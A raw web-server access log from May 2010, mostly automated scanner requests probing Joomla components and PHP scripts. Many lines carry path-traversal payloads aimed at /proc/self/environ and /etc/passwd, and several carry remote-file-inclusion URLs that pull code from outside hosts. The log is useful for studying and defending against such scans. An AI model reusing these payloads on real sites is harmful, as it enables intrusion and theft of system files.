121.78.118.123 - - [28/May/2010:02:25:14 -0500] "GET /logs/access_log.1271548800/SSI.php?sourcedir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.78.118.123 - - [28/May/2010:02:25:14 -0500] "GET /logs/SSI.php?sourcedir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 296 "-""Mozilla/5.0"
116.122.36.34 - - [28/May/2010:02:25:15 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
116.122.36.34 - - [28/May/2010:02:25:16 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
116.122.36.34 - - [28/May/2010:02:25:16 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:25:22 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:25:22 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
116.122.36.34 - - [28/May/2010:02:25:22 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
116.122.36.34 - - [28/May/2010:02:25:23 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
116.122.36.34 - - [28/May/2010:02:25:23 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:26:02 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:26:03 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.60.53.122 - - [28/May/2010:02:28:40 -0500] "GET /logs/access_log.1223683200/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:02:28:40 -0500] "GET /index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:02:28:40 -0500] "GET /logs/index.php?option=com_kochsuite&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
116.122.36.34 - - [28/May/2010:02:30:05 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
116.122.36.34 - - [28/May/2010:02:30:07 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
125.162.206.179 - - [28/May/2010:02:30:56 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
125.162.206.179 - - [28/May/2010:02:30:58 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
125.162.206.179 - - [28/May/2010:02:31:19 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
125.162.206.179 - - [28/May/2010:02:31:20 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
210.109.108.186 - - [28/May/2010:02:31:37 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.44.120.3 - - [28/May/2010:02:33:36 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:02:33:37 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:02:33:37 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7294 "-""libwww-perl/5.805"
87.250.255.243 - - [28/May/2010:02:33:41 -0500] "GET /logs/access_log.1213488000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.109.108.186 - - [28/May/2010:02:34:06 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.78.118.123 - - [28/May/2010:02:35:15 -0500] "GET /logs/access_log.1232668800/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:35:16 -0500] "GET /index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [28/May/2010:02:35:16 -0500] "GET /logs/index.php?option=com_cropimage&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.181.242.208 - - [28/May/2010:02:39:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
204.152.200.50 - - [28/May/2010:02:41:44 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:02:41:53 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:02:41:55 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
121.88.4.141 - - [28/May/2010:02:42:06 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.79"
121.88.4.141 - - [28/May/2010:02:42:07 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
121.88.4.141 - - [28/May/2010:02:42:08 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7294 "-""libwww-perl/5.79"
65.55.37.203 - - [28/May/2010:02:42:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [28/May/2010:02:43:04 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.79"
65.55.37.203 - - [28/May/2010:02:43:04 -0500] "GET /logs/access_log.1212710400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [28/May/2010:02:43:05 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
121.88.4.141 - - [28/May/2010:02:43:05 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7294 "-""libwww-perl/5.79"
204.152.200.50 - - [28/May/2010:02:43:46 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
87.250.255.243 - - [28/May/2010:02:43:50 -0500] "GET /logs/access_log.1178064000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.236.235.245 - - [28/May/2010:02:45:19 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
204.236.235.245 - - [28/May/2010:02:45:19 -0500] "GET /logs/access_log.1230508800 HTTP/1.0" 404 298 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
207.46.204.178 - - [28/May/2010:02:45:29 -0500] "GET /logs/access_log.1205625600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.7.185.19 - - [28/May/2010:02:47:19 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [28/May/2010:02:47:19 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.46.199.38 - - [28/May/2010:02:55:29 -0500] "GET /logs/access_log.1162425600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [28/May/2010:02:56:18 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.201.194 - - [28/May/2010:02:56:56 -0500] "GET /logs/access_log.1273017600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:02:56:56 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:02:56:56 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
72.51.42.60 - - [28/May/2010:03:00:40 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:03:00:41 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:03:00:41 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:03:00:41 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
204.152.200.50 - - [28/May/2010:03:03:46 -0500] "GET /logs/access_log.1273363200/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:03:46 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:03:46 -0500] "GET /logs/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:03:49 -0500] "GET /logs/access_log.1273363200/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:03:49 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:03:50 -0500] "GET /logs/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:03:56 -0500] "GET /logs/access_log.1273363200/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:03:56 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:03:56 -0500] "GET /logs/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.195.240 - - [28/May/2010:03:07:29 -0500] "GET /logs/access_log.1156118400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.58.185.118 - - [28/May/2010:03:08:40 -0500] "GET /phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.58.185.118 - - [28/May/2010:03:08:40 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.58.185.118 - - [28/May/2010:03:08:40 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.58.185.118 - - [28/May/2010:03:08:43 -0500] "GET /phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.58.185.118 - - [28/May/2010:03:08:43 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.58.185.118 - - [28/May/2010:03:08:43 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.91.234.162 - - [28/May/2010:03:09:39 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:40 -0500] "GET /*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:41 -0500] "GET /*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:42 -0500] "GET /*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:43 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:44 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:45 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:46 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:47 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:49 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:50 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:51 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:09:52 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
207.58.185.118 - - [28/May/2010:03:10:49 -0500] "GET /phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.58.185.118 - - [28/May/2010:03:10:49 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.58.185.118 - - [28/May/2010:03:10:49 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.61.185.200 - - [28/May/2010:03:11:01 -0500] "GET ///e404.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.61.185.200 - - [28/May/2010:03:11:06 -0500] "GET /logs///e404.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.61.185.200 - - [28/May/2010:03:11:15 -0500] "GET /logs/access_log.1271548800///e404.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [28/May/2010:03:12:58 -0500] "GET /logs/access_log.1259625600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.152.200.50 - - [28/May/2010:03:13:09 -0500] "GET /logs/access_log.1273363200/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:13:12 -0500] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:13:13 -0500] "GET /logs/*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
69.94.137.93 - - [28/May/2010:03:14:57 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [28/May/2010:03:14:57 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [28/May/2010:03:14:57 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [28/May/2010:03:14:57 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.61.185.200 - - [28/May/2010:03:15:40 -0500] "GET /logs/access_log.1271980800///e404.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.212.226.218 - - [28/May/2010:03:17:07 -0500] "GET /logs/access_log.1215302400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1215302400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)"
91.212.226.218 - - [28/May/2010:03:17:07 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)"
209.44.120.2 - - [28/May/2010:03:17:19 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:03:17:19 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.61.185.200 - - [28/May/2010:03:17:41 -0500] "GET /logs//index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.61.185.200 - - [28/May/2010:03:17:41 -0500] "GET //index.php?option=com_booklibrary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.50.85.15 - - [28/May/2010:03:19:08 -0500] "GET /logs/access_log.1271548800//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
74.50.85.15 - - [28/May/2010:03:19:08 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.50.85.15 - - [28/May/2010:03:19:08 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
208.38.190.72 - - [28/May/2010:03:19:25 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
